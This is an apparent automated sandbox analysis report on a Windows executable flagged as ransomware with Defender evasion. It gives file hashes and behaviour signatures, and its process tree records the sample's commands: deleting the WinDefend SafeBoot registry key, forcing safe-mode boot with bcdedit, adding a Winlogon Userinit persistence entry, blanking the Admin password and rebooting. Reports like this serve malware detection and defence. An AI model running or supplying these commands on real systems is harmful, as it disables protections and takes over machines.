Overview

overview

10

Static

static

10

58bfb9fa88...1f.exe

windows7-x64

58bfb9fa88...1f.exe

windows10-2004-x64

10

5d40615701...3d.exe

windows7-x64

10

5d40615701...3d.exe

windows10-2004-x64

10

ae66e009e1...75.exe

windows7-x64

ae66e009e1...75.exe

windows10-2004-x64

c460fc0d4f...50.exe

windows7-x64

c460fc0d4f...50.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    0s
  • max time network
    6s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    14-05-2024 17:47

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

  • Size

    82KB

  • MD5

    e01e11dca5e8b08fc8231b1cb6e2048c

  • SHA1

    4983d07f004436caa3f10b38adacbba6a4ede01a

  • SHA256

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

  • SHA512

    298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

  • SSDEEP

    1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ

Score
10/10
evasionransomware

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe

Processes

  • C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
    "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
    1⤵
      PID:1636
      • C:\Windows\system32\reg.exe
        "reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
        2⤵
        • Modifies registry key
        PID:2252
      • C:\Windows\system32\bcdedit.exe
        "bcdedit.exe" /set {default} safeboot network
        2⤵
        • Modifies boot configuration data using bcdedit
        PID:2936
      • C:\Windows\system32\reg.exe
        "reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe","C:\Windows\system32\userinit.exe" /f
        2⤵
          PID:3000
        • C:\Windows\system32\net.exe
          "net.exe" user Admin ""
          2⤵
            PID:2500
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 user Admin ""
              3⤵
                PID:2588
            • C:\Windows\system32\shutdown.exe
              "shutdown.exe" /r /t 0
              2⤵
                PID:2536
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x0
              1⤵
                PID:2524
              • C:\Windows\system32\LogonUI.exe
                "LogonUI.exe" /flags:0x1
                1⤵
                  PID:836

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/1636-0-0x000007FEF5BA3000-0x000007FEF5BA4000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1636-1-0x00000000003E0000-0x00000000003FA000-memory.dmp

                  Filesize

                  104KB

                  Download

                • memory/1636-2-0x000007FEF5BA0000-0x000007FEF658C000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/2524-3-0x0000000002E10000-0x0000000002E11000-memory.dmp

                  Filesize

                  4KB

                  Download